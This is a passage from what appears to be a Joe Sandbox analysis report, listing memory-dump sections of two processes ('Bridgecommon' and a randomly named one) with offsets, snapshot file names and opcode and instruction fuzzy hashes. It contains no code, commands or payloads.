                                                                                              • Source File: 00000037.00000002.2778709297.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_55_2_7ffd9bad0000_Bridgecommon.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: faba7ebe20e93a4784cdb339ea5f30e6bcdfc1768c86c721166dbcbd5737e02a
                                                                                              • Instruction ID: be7451a2b22a450d03ff35be8cfb3488d50b7d66a64c0b6fee3d2b15a1423958
                                                                                              • Opcode Fuzzy Hash: faba7ebe20e93a4784cdb339ea5f30e6bcdfc1768c86c721166dbcbd5737e02a
                                                                                              • Instruction Fuzzy Hash: E691D672E19A898FE75DDB6888697A97FE0FF99324F0102BED049C72D6CBB81405C740
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000037.00000002.2778709297.00007FFD9BAF3000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAF3000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_55_2_7ffd9baf3000_Bridgecommon.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: [
                                                                                              • API String ID: 0-784033777
                                                                                              • Opcode ID: 2e22b873c191d49c490a480e30419d343806f7026aeb5de892ad85ba87155204
                                                                                              • Instruction ID: bbf7a2260f85285b4908543e04c03b12b0e80d2114a3353d194ffcbe533aaa0c
                                                                                              • Opcode Fuzzy Hash: 2e22b873c191d49c490a480e30419d343806f7026aeb5de892ad85ba87155204
                                                                                              • Instruction Fuzzy Hash: F3119431A1CB588FDB64DF18C4456AABBE1FB98711F12053ED489E3270CB74B9418B83
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000037.00000002.2778709297.00007FFD9BB01000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BB01000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_55_2_7ffd9bb01000_Bridgecommon.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: M
                                                                                              • API String ID: 0-3664761504
                                                                                              • Opcode ID: bfbefb590432468084fd49266a04cd45f1a3350012849f0dde65ead55788496e
                                                                                              • Instruction ID: 9d4c664d71cd1ef77a1365299136f9f7734d95e4671a2bb8773e28da2f205024
                                                                                              • Opcode Fuzzy Hash: bfbefb590432468084fd49266a04cd45f1a3350012849f0dde65ead55788496e
                                                                                              • Instruction Fuzzy Hash: 9D11BF2150F3C54FDB57977488289A97FA0AF43615B0A81EEE0C5CF0F3DA69494AC712
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000037.00000002.2778709297.00007FFD9BAF3000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAF3000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_55_2_7ffd9baf3000_Bridgecommon.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: M
                                                                                              • API String ID: 0-3664761504
                                                                                              • Opcode ID: 5645e9c95e10507c81d28ecf6e6c674d3af451f6d614477c019ba94662d51f03
                                                                                              • Instruction ID: fc38cdb605ba5b6bc51c43ac383f40d75dc8d17da9596b066e0b5616aefb82e3
                                                                                              • Opcode Fuzzy Hash: 5645e9c95e10507c81d28ecf6e6c674d3af451f6d614477c019ba94662d51f03
                                                                                              • Instruction Fuzzy Hash: 4E014F2454E3D54FCB17977884644E5BF70EE1726070A92EFD085CF4A3E61C898ACB41
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000037.00000002.2778709297.00007FFD9BB01000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BB01000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_55_2_7ffd9bb01000_Bridgecommon.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: C7
                                                                                              • API String ID: 0-2279091541
                                                                                              • Opcode ID: 74650801e3cc4e640c2306cf05c75938f421c058a6a6324b518f02867f18d2f0
                                                                                              • Instruction ID: 82ec448632bd9d226ccb6cd4c03472d2d2ceabdeffa33a078a69233e6e68bb07
                                                                                              • Opcode Fuzzy Hash: 74650801e3cc4e640c2306cf05c75938f421c058a6a6324b518f02867f18d2f0
                                                                                              • Instruction Fuzzy Hash: FDF0B421B0990E4FF6A9E65848EA7B862C2FF98315F054476E04CC71E7DE2868814241
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000037.00000002.2778709297.00007FFD9BB01000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BB01000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_55_2_7ffd9bb01000_Bridgecommon.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: M
                                                                                              • API String ID: 0-3664761504
                                                                                              • Opcode ID: f64fda5e2a283c5a6f20f5bc460977e2c33a95fab3921efa84f9000537be349d
                                                                                              • Instruction ID: afbd80f9ef0ad0fad0cf1b735c2b400d77d19183b0cef39e93db4313243bea19
                                                                                              • Opcode Fuzzy Hash: f64fda5e2a283c5a6f20f5bc460977e2c33a95fab3921efa84f9000537be349d
                                                                                              • Instruction Fuzzy Hash: 1FE06D6164E7C84FC71AEA748869554BFA0EF6721174A42EFC085CF5A7EA2D8885C701
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000037.00000002.2778709297.00007FFD9BB01000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BB01000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_55_2_7ffd9bb01000_Bridgecommon.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: M
                                                                                              • API String ID: 0-3664761504
                                                                                              • Opcode ID: 6164b1069710f8b3b52f48148b439a8276ab5531142d88090189c8fbc13049d9
                                                                                              • Instruction ID: 3d62a0c47176d44997c82c0e1f821f8ab33fecd675541abfaf393db1c4301b03
                                                                                              • Opcode Fuzzy Hash: 6164b1069710f8b3b52f48148b439a8276ab5531142d88090189c8fbc13049d9
                                                                                              • Instruction Fuzzy Hash: F8E06D6164E7C44FCB1AEA758869454BFA0EF6720174A52EEC085CF5A7EA2D8889C701
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000037.00000002.2778709297.00007FFD9BB01000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BB01000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_55_2_7ffd9bb01000_Bridgecommon.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: M
                                                                                              • API String ID: 0-3664761504
                                                                                              • Opcode ID: 1180c0164a1678c14bbd07de09373b86f6d47de75d9a1041d2375b4828baaeea
                                                                                              • Instruction ID: 89b5110806269fea2bc7528639372eea444baea11129436563572e6916387cf4
                                                                                              • Opcode Fuzzy Hash: 1180c0164a1678c14bbd07de09373b86f6d47de75d9a1041d2375b4828baaeea
                                                                                              • Instruction Fuzzy Hash: 81E09271A0E3C44FC71AEB3488688547F60EE6B21134A42EFC045CF2A7EA2DCC85C701
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000037.00000002.2778709297.00007FFD9BAF3000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAF3000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_55_2_7ffd9baf3000_Bridgecommon.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: I
                                                                                              • API String ID: 0-3707901625
                                                                                              • Opcode ID: 0092ded93127deea18adf1d4c86615d31208ed26a7bdb0caad6650519258112c
                                                                                              • Instruction ID: 7a38ba0a6d7df1508af04d942fd0bb22f681d1dbef1f3c5f7414117e67c9668c
                                                                                              • Opcode Fuzzy Hash: 0092ded93127deea18adf1d4c86615d31208ed26a7bdb0caad6650519258112c
                                                                                              • Instruction Fuzzy Hash: 92E01A6154F3C44FCB1AEB7488698553F609E6721078B40EEC545CF1B3E62DC949C702
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000037.00000002.2778709297.00007FFD9BB01000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BB01000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_55_2_7ffd9bb01000_Bridgecommon.jbxd
                                                                                              • Instruction ID: a0010583900a89edfd703a8e1159066a4fda408acd39631b023e0bab7e7315c7
                                                                                              • Opcode Fuzzy Hash: 7aed316ceae474d060d593c01cb7df5676e94ae54d34ac94682119992c5ea024
                                                                                              • Instruction Fuzzy Hash: AEE09220B197C44FCB0B9A3C48685607FA1EF571057C952EAC046CB1A3E918DC85C742
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000037.00000002.2778709297.00007FFD9BB01000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BB01000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_55_2_7ffd9bb01000_Bridgecommon.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: f707c1c7700c84bdc2fa7b8863d9dbcc75505be42f67ee76dfe9e5e855e5aea7
                                                                                              • Instruction ID: 343ba5e9e9bb1c9d1940badee7ff9fc5afa3bfd3d09b69df29b991ca14f1d62e
                                                                                              • Opcode Fuzzy Hash: f707c1c7700c84bdc2fa7b8863d9dbcc75505be42f67ee76dfe9e5e855e5aea7
                                                                                              • Instruction Fuzzy Hash: 32E02223F0E6884FE31A0A384C748B43B609F3B22A34F00A7D08ACB6F7D8059D098302
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000037.00000002.2778709297.00007FFD9BAE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAE0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_55_2_7ffd9bae0000_Bridgecommon.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 6423f9a32994c9fa5df0eacea30a6c69e5a69a9e32b4f4fdeb5ceeb97aa0a1a8
                                                                                              • Instruction ID: 4355adbbd43c972decf751e3eb68995ea99a7e288ca72358cf659e8ce7a811e9
                                                                                              • Opcode Fuzzy Hash: 6423f9a32994c9fa5df0eacea30a6c69e5a69a9e32b4f4fdeb5ceeb97aa0a1a8
                                                                                              • Instruction Fuzzy Hash: 05F08231E0851E8BFB19EB84C865ABD73E5FB50310F010679D4269B2E8DEB86A018B80
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000037.00000002.2778709297.00007FFD9BAF3000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAF3000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_55_2_7ffd9baf3000_Bridgecommon.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 3d9f8be3ba615e18499f3b8e9abe0a8b87aeeb0acf764803db3cd1d473a39dbc
                                                                                              • Instruction ID: 54494d4839a1049948f64c419503b0db34feda57208a74932c42a1364c45b394
                                                                                              • Opcode Fuzzy Hash: 3d9f8be3ba615e18499f3b8e9abe0a8b87aeeb0acf764803db3cd1d473a39dbc
                                                                                              • Instruction Fuzzy Hash: 33E01A20A497844FCB0AAA3888695503FB1DF6B215B8A00D6C045CB1B3D51DD849C751
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000037.00000002.2778709297.00007FFD9BB01000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BB01000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_55_2_7ffd9bb01000_Bridgecommon.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 525ae91c99862d75867d9db26404daaa026ecb39af5735a8a8152f1b7fb19109
                                                                                              • Instruction ID: 2801a0626bf49da33327d900b299ad47e65a3a1cbe7daae0b93aa7b69d7b4c61
                                                                                              • Opcode Fuzzy Hash: 525ae91c99862d75867d9db26404daaa026ecb39af5735a8a8152f1b7fb19109
                                                                                              • Instruction Fuzzy Hash: 64E04F20A4D7C44FCB0AAB3888695503FA0DF6B215B8A01DAC045CB1B3D51DDC49C711
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000037.00000002.2778709297.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_55_2_7ffd9bad0000_Bridgecommon.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 8748f2229d9a10e94c6efc2157f07e6e16cd93f3582194c6cf9ecaf4c4e98379
                                                                                              • Instruction ID: d970297d9ea763ed99bcc6b45aaf724dccbfa35258043d9f1aa455cc997075f9
                                                                                              • Opcode Fuzzy Hash: 8748f2229d9a10e94c6efc2157f07e6e16cd93f3582194c6cf9ecaf4c4e98379
                                                                                              • Instruction Fuzzy Hash: A4F02270918A1CCFCF98DB48C495EE9B7F1FB68305F114599914AE7260CB31AA80CF85
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000037.00000002.2778709297.00007FFD9BAE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAE0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_55_2_7ffd9bae0000_Bridgecommon.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: c0186bf66b95d362cb25a69d1c9eaecfc839f880f9ecefc7387d894ca53d3705
                                                                                              • Instruction ID: 76b4888e6025a938afe51861bed46b7babfd62e827d48f24d27dbce629313bbb
                                                                                              • Opcode Fuzzy Hash: c0186bf66b95d362cb25a69d1c9eaecfc839f880f9ecefc7387d894ca53d3705
                                                                                              • Instruction Fuzzy Hash: 20E04F3270DC0E46FB75A75088705BF3696EBD0319B130339C02EC21B1DEBCA7028641
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000037.00000002.2778709297.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_55_2_7ffd9bad0000_Bridgecommon.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: b4de9ccdc03301b4f8b34275fbf37b0f750ec48e4bf8e95f9c956194bf01efe9
                                                                                              • Instruction ID: 80f32f3af981112524dfa9caf3547bb5af2cc3d6dc48dfb79d6b70ebd687c03b
                                                                                              • Opcode Fuzzy Hash: b4de9ccdc03301b4f8b34275fbf37b0f750ec48e4bf8e95f9c956194bf01efe9
                                                                                              • Instruction Fuzzy Hash: 4DE01230F0D11A46FBB49754D8617F962B0EBD4300F1121B8D50E933D1DD78AF81CA49
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000037.00000002.2778709297.00007FFD9BB01000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BB01000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_55_2_7ffd9bb01000_Bridgecommon.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 86516cfc4d8a0d480af8f07283063ca962ff981a2c8af2a83e93b7d611e3f089
                                                                                              • Instruction ID: 3b92578e4f7772e49ffbfe9f1dff6bdc011e0549b8a98965e61b2550fcb9a3e4
                                                                                              • Opcode Fuzzy Hash: 86516cfc4d8a0d480af8f07283063ca962ff981a2c8af2a83e93b7d611e3f089
                                                                                              • Instruction Fuzzy Hash: 41D0A930B10E0C4B8B0CB63D885C430B3D2E7B9202384536E940AC32A1ED26ECC9CB80
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000037.00000002.2778709297.00007FFD9BB01000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BB01000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_55_2_7ffd9bb01000_Bridgecommon.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 0218f1920cd5dc8b9e92e8aa7127dd9017e17d16ca50bd8928d23b5b91b0b709
                                                                                              • Instruction ID: 0adc029638af732f1c5008ccfe32db8d26f2a395cc251c8000867d32e9d1937a
                                                                                              • Opcode Fuzzy Hash: 0218f1920cd5dc8b9e92e8aa7127dd9017e17d16ca50bd8928d23b5b91b0b709
                                                                                              • Instruction Fuzzy Hash: 3CE0BF6294B7C44FC74B973588A88947F60DE5721178A41EAC145CF6B3E92A8D49C711
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000037.00000002.2778709297.00007FFD9BB01000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BB01000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_55_2_7ffd9bb01000_Bridgecommon.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 86516cfc4d8a0d480af8f07283063ca962ff981a2c8af2a83e93b7d611e3f089
                                                                                              • Instruction ID: 3b92578e4f7772e49ffbfe9f1dff6bdc011e0549b8a98965e61b2550fcb9a3e4
                                                                                              • Opcode Fuzzy Hash: 86516cfc4d8a0d480af8f07283063ca962ff981a2c8af2a83e93b7d611e3f089
                                                                                              • Instruction Fuzzy Hash: 41D0A930B10E0C4B8B0CB63D885C430B3D2E7B9202384536E940AC32A1ED26ECC9CB80
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000037.00000002.2778709297.00007FFD9BB01000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BB01000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_55_2_7ffd9bb01000_Bridgecommon.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: adc8c1cc4189f6213beb4c47a9043b7249ccb8ad43b31e47a810099371ac5710
                                                                                              • Instruction ID: f7022e37af43f2e05e986e1a0cc446726f3858d82e436fa8ced5b60d6f119fd7
                                                                                              • Opcode Fuzzy Hash: adc8c1cc4189f6213beb4c47a9043b7249ccb8ad43b31e47a810099371ac5710
                                                                                              • Instruction Fuzzy Hash: 46E01A2294E7C04FC70B973588A98547F60AE1721474A40EBC085CF1F3E9299949C711
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000037.00000002.2778709297.00007FFD9BB01000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BB01000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_55_2_7ffd9bb01000_Bridgecommon.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 071be711cb797368beb8756d0463c5fa29b116a5dfca29274390be4a16e0f005
                                                                                              • Instruction ID: c0e27e007c3273bfcd7392255f06bff471b2acec24bc275eef56d109f6faa75a
                                                                                              • Opcode Fuzzy Hash: 071be711cb797368beb8756d0463c5fa29b116a5dfca29274390be4a16e0f005
                                                                                              • Instruction Fuzzy Hash: FFE04F2194F7C04FC71B973488799547F60EF6721078A40EEC085CF5F3D9199949C702
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000037.00000002.2778709297.00007FFD9BB01000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BB01000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_55_2_7ffd9bb01000_Bridgecommon.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 30b88120e300ce741a67909c90f8bad83c6bf9a8a2db7280cd1828b58fc114cc
                                                                                              • Instruction ID: 8f180aab2aa75e9180ee0f7869d42a8d0eff98467748f81fc95ef1229aac25a4
                                                                                              • Opcode Fuzzy Hash: 30b88120e300ce741a67909c90f8bad83c6bf9a8a2db7280cd1828b58fc114cc
                                                                                              • Instruction Fuzzy Hash: D2D01230750D084F8B4CF63C885996033D1E76D2167854059D00AC72B1E966DC89C741
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000037.00000002.2778709297.00007FFD9BB01000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BB01000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_55_2_7ffd9bb01000_Bridgecommon.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: dad24a7085e4b25ae976ee30ed72e40c0fd5f4a8708794f52b09698d4d43b31b
                                                                                              • Instruction ID: a565302b9b7bcc34a1d7b6cb08a6a6e7b8abe4aeb70df905b6acc3b2f1e45e16
                                                                                              • Opcode Fuzzy Hash: dad24a7085e4b25ae976ee30ed72e40c0fd5f4a8708794f52b09698d4d43b31b
                                                                                              • Instruction Fuzzy Hash: B4D02230B518040FC70CA738885883433A0EB6A20A78140A8D00AC72F1D92AEC88C780
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000037.00000002.2778709297.00007FFD9BB01000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BB01000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_55_2_7ffd9bb01000_Bridgecommon.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 1388b68208c2cafb3d95faa5872f9f62582b941bae5f6671caa91d2bd9987ffc
                                                                                              • Instruction ID: 3ca3d89b2a44c1ccc83115d2dd53154f4f74bb52458d03ecdb794458fcb23236
                                                                                              • Opcode Fuzzy Hash: 1388b68208c2cafb3d95faa5872f9f62582b941bae5f6671caa91d2bd9987ffc
                                                                                              • Instruction Fuzzy Hash: 87D02230B548040FC70CA63A88588347390EB6A21A7C100A8D00AC72B5E92ADC88C740
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000037.00000002.2778709297.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_55_2_7ffd9bad0000_Bridgecommon.jbxd
                                                                                              Similarity
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000038.00000002.2889938688.00007FFD9BAE1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAE1000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_56_2_7ffd9bae1000_nFQRHbQjcuhfqIAubZpdQD.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: I
                                                                                              • API String ID: 0-3707901625
                                                                                              • Opcode ID: c8b7fc0e0ad1f5a35726b30c00ef172d6c06f675e444d699d78764cf32f13124
                                                                                              • Instruction ID: a8364c9ce7d84e068ad657ae1671a28a26181049dcc1efd1f1c751bcadd21369
                                                                                              • Opcode Fuzzy Hash: c8b7fc0e0ad1f5a35726b30c00ef172d6c06f675e444d699d78764cf32f13124
                                                                                              • Instruction Fuzzy Hash: B7E04F7154E3C04FCB0AEB7884699457F70EE6721178B41EEC04ACF1B3E62D8949C701
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000038.00000002.2889938688.00007FFD9BAD3000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD3000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_56_2_7ffd9bad3000_nFQRHbQjcuhfqIAubZpdQD.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 3d224f414d7383ec138aba97b40a0564ad30d6266a7773fa9d96b6d32aa36650
                                                                                              • Instruction ID: 686d81cf0876e6d1f21f2328c676de211ac0cd4b19c2af96b5dad157d3a47ae8
                                                                                              • Opcode Fuzzy Hash: 3d224f414d7383ec138aba97b40a0564ad30d6266a7773fa9d96b6d32aa36650
                                                                                              • Instruction Fuzzy Hash: 81A17E31B189094FDB98EB68C4A8AB977E2FF98314F514679E01DC72D6CF34E9428B41
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000038.00000002.2889938688.00007FFD9BAE1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAE1000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_56_2_7ffd9bae1000_nFQRHbQjcuhfqIAubZpdQD.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 23e9eaf874c9891486b5f5381b458f7651f9c4d9114ce49482381d9f205ad9e3
                                                                                              • Instruction ID: 17e5d74ae28f21a8ba21f10109c434d11f943f17ed1398008e640bafdd53bbb8
                                                                                              • Opcode Fuzzy Hash: 23e9eaf874c9891486b5f5381b458f7651f9c4d9114ce49482381d9f205ad9e3
                                                                                              • Instruction Fuzzy Hash: 3F811531B1DA4E0FEBADEB5884766B872C2EF98350F4541BAE40DC72E7DD68AD414340
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000038.00000002.2889938688.00007FFD9BAE1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAE1000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_56_2_7ffd9bae1000_nFQRHbQjcuhfqIAubZpdQD.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: a6f58c5e2848f31538e6e4d2afbccfc4efa7a7ddd99e8120871d3463e8dbabb1
                                                                                              • Instruction ID: a084a56ce3cc72f227dc4179aa631784e882024dbb51cc9c9fc6136346e354a2
                                                                                              • Opcode Fuzzy Hash: a6f58c5e2848f31538e6e4d2afbccfc4efa7a7ddd99e8120871d3463e8dbabb1
                                                                                              • Instruction Fuzzy Hash: FB51E431B1DA4E0FEBADEB5C84726B872C2EF98310F45417AE40EC72E7ED68A9414740
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000038.00000002.2889938688.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_56_2_7ffd9bab0000_nFQRHbQjcuhfqIAubZpdQD.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: bd7b97700fbc83591aaf34c21eee4255ca39cec996143a422910b2af68da7b3e
                                                                                              • Instruction ID: a8b0ebf61083c4a659264d97e5f89f1dec86feb1d7de1769dbe32a8638e934d6
                                                                                              • Opcode Fuzzy Hash: bd7b97700fbc83591aaf34c21eee4255ca39cec996143a422910b2af68da7b3e
                                                                                              • Instruction Fuzzy Hash: 0231063130D9184FDB68EB5CE88A9B977D0EF9932170545BBE48AC7166D911EC828BC1
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000038.00000002.2889938688.00007FFD9BAE1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAE1000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_56_2_7ffd9bae1000_nFQRHbQjcuhfqIAubZpdQD.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 15e10d2eaa5084363e878c2f10b68ef02d5cfd9f2bee49673172f0d7ee3a042d
                                                                                              • Instruction ID: 2d820a44bd2ec7c3f293b2a5a30d8b9cf5dea9d3278dfe4692870d994aba69b3
                                                                                              • Opcode Fuzzy Hash: 15e10d2eaa5084363e878c2f10b68ef02d5cfd9f2bee49673172f0d7ee3a042d
                                                                                              • Instruction Fuzzy Hash: CF31D261B1ED5E0FE7E8E79C88B56B826C2EFA8350F4541B9E00EC72E6DD686C418341
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000038.00000002.2889938688.00007FFD9BAE1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAE1000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_56_2_7ffd9bae1000_nFQRHbQjcuhfqIAubZpdQD.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 53b31261736bc3e13d0a97e7cf8cc6962515534609263abfafec05edcb1b745f
                                                                                              • Instruction ID: e5780087af449f24e76972fb3b95babd7c225b916f014b9a3d7b69b2eb1612a6
